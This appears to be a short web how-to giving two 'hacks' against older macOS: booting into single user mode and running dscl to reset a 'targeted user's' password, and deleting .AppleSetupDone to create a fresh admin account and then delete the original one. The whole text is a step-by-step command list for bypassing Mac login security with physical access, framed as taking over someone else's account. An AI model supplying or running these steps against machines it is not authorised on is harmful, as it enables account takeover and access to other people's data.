Hack 1 Single User Mode :
- Boot into single user mode (press Command-S at power on)
- Type fsck -fy
- Type mount -uw /
- Type launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist
- Type dscl . -passwd /Users/username password, replace “username” with the targeted user and “password” with the password you wants.
Hack 2 Fooling OS X with Registration Process :
- Hold apple + s down after you hear the chime.
- When you get text prompt enter in these terminal commands to create a brand new admin account (hitting return after each line):
- mount -uw /
- rm /var/db/.AppleSetupDone
- shutdown -h now
- After rebooting you should have a brand new admin account. When you login as the new admin you can simply delete the old one and you’re good to go again!